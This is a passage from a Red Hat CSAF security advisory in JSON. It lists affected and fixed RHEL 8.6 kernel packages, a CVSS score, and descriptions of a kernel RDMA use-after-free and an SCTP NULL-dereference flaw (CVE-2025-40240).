            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H",
            "version": "3.1"
          },
          "products": [
            "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-core-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-devel-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:kernel-zfcpdump-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
            "BaseOS-8.6.0.Z.E4S:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.src",
            "BaseOS-8.6.0.Z.TUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
            "BaseOS-8.6.0.Z.TUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "kernel: Linux kernel: RDMA/rxe use-after-free vulnerability leading to potential arbitrary code execution"
    },
    {
      "cve": "CVE-2025-40240",
      "cwe": {
        "id": "CWE-476",
        "name": "NULL Pointer Dereference"
      },
      "discovery_date": "2025-12-04T00:00:00+00:00",
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2418832"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsctp: avoid NULL dereference when chunk data buffer is missing\n\nchunk-\u003eskb pointer is dereferenced in the if-block where it\u0027s supposed\nto be NULL only.\n\nchunk-\u003eskb can only be NULL if chunk-\u003ehead_skb is not. Check for frag_list\ninstead and do it just before replacing chunk-\u003eskb. We\u0027re sure that\notherwise chunk-\u003eskb is non-NULL because of outer if() condition.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "kernel: sctp: avoid NULL dereference when chunk data buffer is missing",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "A missing data buffer (frag_list) in SCTP chunk processing could trigger a NULL pointer dereference when handling GSO packets.\nA remote attacker sending a malformed SCTP packet could cause a kernel crash (DoS).\nThe system is vulnerable only if CONFIG_IP_SCTP enabled in Kernel configuration (and for the Red Hat Enterprise Linux it is always disabled in older versions and enabled as module in latest versions only). However even if module exists in Red Hat Enterprise Linux, still admin need to specially enable it usage (make some SCTP listening port available) before exploitation would be possible.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "BaseOS-8.6.0.Z.AUS:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.AUS:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.AUS:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-doc-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.AUS:kernel-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:kernel-tools-libs-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:python3-perf-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.AUS:python3-perf-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:bpftool-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:bpftool-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.src",
          "BaseOS-8.6.0.Z.E4S:kernel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-abi-stablelists-0:4.18.0-372.185.1.el8_6.noarch",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-core-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-devel-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debug-modules-extra-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-0:4.18.0-372.185.1.el8_6.x86_64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-aarch64-0:4.18.0-372.185.1.el8_6.aarch64",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-ppc64le-0:4.18.0-372.185.1.el8_6.ppc64le",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-s390x-0:4.18.0-372.185.1.el8_6.s390x",
          "BaseOS-8.6.0.Z.E4S:kernel-debuginfo-common-x86_64-0:4.18.0-372.185.1.el8_6.x86_64",
